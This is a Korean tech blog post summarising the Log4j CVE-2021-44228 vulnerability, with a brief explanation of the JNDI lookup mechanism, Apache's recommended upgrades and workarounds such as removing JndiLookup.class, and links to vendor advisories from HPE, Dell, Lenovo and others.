본문 바로가기
HW Knowledge

떠들석한 Log4j 취약점

by 스쳐가는인연 2021. 12. 23.

세간에 떠들석한 Log4j 취약점 공부

CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Log4j Library (Java based)의 취약점 보고됨
Log4j는 Java/Kotlin/Scala/Groovy 코딩 도중에 프로그램의 로그를 기록해주는 라이브러리로, 프로그램 실행 시 자동으로 지정한 경로에 로그를 저장해주는 기능을 함.

Java 프로그램들은 JNDI와 LDAP을 통해 Java 객체를 찾을 수 있음.

Log4j에는 편리하게 사용하기 위해 ${prefix:name} 형식으로 Java 객체를 볼 수 있게 하는 문법이 존재함. 
예) ${java:version} > 현재 실행 중인 Java 버전 확인

이 취약점은 JNDI와 LDAP를 이용, 해커가 위 유형의 문법을 통해 악의적인 활용(악의적인 코드 수행 또는 DOS 공격 등)을 할 수 있다는 것이 확인됨

 

Apache에 따르면, log4j-core JAR file이 영향을 받기 때문에, 해당 파일을 사용하지 않는 상황에서, log4j-api JAR file만 사용하는 경우는 영향을 받지 않는다고함. (JndiLookup Class ...)

 

각 HW/SW 제조사는 자사 제품의 영향도를 빠르게 파악하고 있고, 대책을 준비하고 있는 듯하다.

- 지속 업데이트 중으로, 정확한 현황은 각 제조사의 게시판을 참조하는 것이 명확하겠다.

 

주) JNDI는 Java Naming and Directory Interface의 약자로 1990년대 후반부터 Java에 추가된 인터페이스로 Java 프로그램이 디렉토리를 통해 데이터(Java 객체 형태)를 찾을 수 있도록 하는 디렉토리 서비스.


Recommended Action:
· Java 8 : Log4j 2.17.0으로 업데이트
· Java 7 : Log4j 2.12.3으로 업데이트

· Java 6 : Log4j 2.3.1으로 업데이트

Workaround Action:
--------------------------------------------------------

Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2.

   - JndiLookup 클래스를 경로에서 제거
      # zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

   - JMSAppender 사용 확인 후 코드 수정 또는 삭제

 

 

그 외, Workaround 역시 지속 검증 및 업데이트 되고 있음)

In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} 

with Thread Context Map patterns (%X, %mdc, or %MDC).
Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where

they originate from sources external to the application such as HTTP headers or user input.

Other insufficient mitigation measures are: setting system property log4j2.formatMsgNoLookups or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true for releases >= 2.10, or modifying the logging configuration to disable message lookups with %m{nolookups}, %msg{nolookups} or %message{nolookups} for releases >= 2.7 and <= 2.14.1.
--------------------------------------------------------

 

Note. Apache에 따르면, 버전 상향 또는 JndiLookup classs 제거 외의 조치는 완전히 회피하지 못한다고 함.

The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar.

 


참고자료:
--------------------------------------------------------
Public Vulnerability Website -  Apache Software Log4j
https://www.hpe.com/us/en/services/security-vulnerability.html

Apache Software Log4j (CVE-2021-44228)
https://techhub.hpe.com/eginfolib/securityalerts/Apache%20Software%20Log4j/Apache_Software_Log4j.html

HPESBGN04215 rev.3 - Certain HPE Products using Apache Log4j2, Remote Code Execution
https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04215en_us

Notice: (Revision) Apache Software Log4j - Security Vulnerability CVE-2021-44228
https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-a00120086en_us
--------------------------------------------------------

Re: Is OneView vulnerable to the Apache Software Log4j Vulnerability (CVE-2021-44228)?
https://community.hpe.com/t5/HPE-OneView/Is-OneView-vulnerable-to-the-Apache-Software-Log4j-Vulnerability/m-p/7156431#M6733

ChrisLynch HPE PRO
HPE OneView and OneView Global Dashboard are not vulnerable to the log4j exploit. While both use log4j, it is an older version without the exploit and does not allow an external attacker access to its endpoint (it is restricted to internal authenticated services only).
iLO does not use log4j at all, in any firmware version for any generation of ASIC.

--------------------------------------------------------
Log4j 보안 취약점 사태
https://namu.wiki/w/Log4j%20%EB%B3%B4%EC%95%88%20%EC%B7%A8%EC%95%BD%EC%A0%90%20%EC%82%AC%ED%83%9C#fn-1

Apache Log4j 보안 업데이트 권고
https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389

Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
Description
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property log4j2.formatMsgNoLookups to true do NOT mitigate this specific vulnerability.

Fixed in Log4j 2.12.2 and Log4j 2.16.0

Mitigation
Log4j 1.x mitigation: Log4j 1.x is not impacted by this vulnerability.
Please note that Log4j 1.x has reached end of life and is no longer supported. Vulnerabilities reported after August 2015 against Log4j 1.x were not checked and will not be fixed.

Log4j 2.x mitigation: Implement one of the mitigation techniques below.
   Java 8 (or later) users should upgrade to release 2.17.0.
   Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
   Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
   Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.

 

The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar.

Also note that Apache Log4j is the only Logging Services subproject affected by this vulnerability. Other projects like Log4net and Log4cxx are not impacted by this.


Log4J-Mitigation-CVE-2021-44228
https://github.com/thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet

Microsoft’s Response to CVE-2021-44228 Apache Log4j 2
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/

Apache Log4j 2
https://logging.apache.org/log4j/2.x/download.html

log4j취약점대응하기
https://9d4u.tistory.com/m/1313
--------------------------------------------------------

--------------------------------------------------------
Additional Information for Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
https://www.dell.com/support/kbdoc/en-us/000194416/additional-information-for-apache-log4j-remote-code-execution-vulnerability-cve-2021-44228

DSN-2021-007: Dell Response to Apache Log4j Remote Code Execution Vulnerability
https://www.dell.com/support/kbdoc/en-us/000194372/dsn-2021-007-dell-response-to-apache-log4j-remote-code-execution-vulnerability

Dell Response to Apache Log4j Remote Code Execution Vulnerability
https://www.dell.com/support/kbdoc/en-us/000194414/dell-response-to-apache-log4j-remote-code-execution-vulnerability

Security Advisories and Notices
https://www.dell.com/support/security/en-us
--------------------------------------------------------

--------------------------------------------------------
Lenovo - Apache Log4j Vulnerability
https://support.lenovo.com/ca/en/product_security/len-76573

Lenovo Product Security Advisories and Announcements
https://support.lenovo.com/ca/en/product_security/home
--------------------------------------------------------

Log4j overview related software
https://github.com/NCSC-NL/log4shell/blob/main/software/README.md

 

 

 

 

 

 

 

반응형